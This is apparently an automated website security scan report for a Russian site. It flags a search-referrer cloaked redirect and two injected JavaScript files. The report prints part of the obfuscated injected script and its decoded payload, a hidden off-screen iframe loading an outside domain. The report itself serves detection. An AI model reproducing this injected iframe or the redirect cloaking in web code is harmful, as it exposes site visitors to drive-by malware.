Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.domromanova.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.domromanova.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 15 Aug 2014 22:11:17 GMT Location: http://tinyurl.com/cqk93nz Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 177549c4956b805df09e2411a5c35f45=43d72abeddff99af8e5cdf087acd457f; path=/ X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.domromanova.com/ | 200 OK Content-Length: 14241 Content-Type: text/html | clean |
http://www.domromanova.com/media/system/js/caption.js | 200 OK Content-Length: 31979 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[2911 bytes skipped]... Decoded script: <iframe src=http://center.eurosider-slo.com/?id=click style=position:absolute;left:-1999px;top:-1999px; height="200" width="200"></iframe> | ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12388 Content-Type: application/javascript | clean |
http://www.domromanova.com/templates/domromanova/flash/mediaplayer/jwplayer.js | 200 OK Content-Length: 30015 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[1489 bytes skipped]... Decoded script: <iframe src=http://center.eurosider-slo.com/?id=click style=position:absolute;left:-1999px;top:-1999px; height="200" width="200"></iframe> | ||
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 99688 Content-Type: application/javascript | clean |
http://platform.linkedin.com/in.js | 200 OK Content-Length: 3690 Content-Type: text/javascript | clean |
http://userapi.com/js/api/openapi.js | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://cdn.connect.mail.ru/js/loader.js | 200 OK Content-Length: 4120 Content-Type: application/x-javascript | clean |
http://www.domromanova.com/trener.html | 200 OK Content-Length: 12345 Content-Type: text/html | clean |
http://www.domromanova.com/treningi.html | 200 OK Content-Length: 15728 Content-Type: text/html | clean |
http://www.domromanova.com/arxiv.html | 200 OK Content-Length: 16663 Content-Type: text/html | clean |
http://www.domromanova.com/kontakty.html | 200 OK Content-Length: 17884 Content-Type: text/html | clean |
http://api-maps.yandex.ru/2.0-stable/?lang=ru-RU&coordorder=longlat&load=package.full&wizard=constructor&onload=fid_135360195889487459938 | 200 OK Content-Length: 70808 Content-Type: text/javascript | clean |
http://www.domromanova.com//yandex.st/share/share.js/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 15 Aug 2014 22:11:24 GMT Location: /index.php?option=com_content&view=article&id=19 Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 177549c4956b805df09e2411a5c35f45=f173711218aa83f381b1cfc6fc9af46f; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.domromanova.com/index.php?option=com_content&view=article&id=19 | 200 OK Content-Length: 11227 Content-Type: text/html | clean |
http://www.domromanova.com/../../undefined/ | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=domromanova.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://domromanova.com/
Result: domromanova.com is not infected or malware details are not published yet.
Result: domromanova.com is not infected or malware details are not published yet.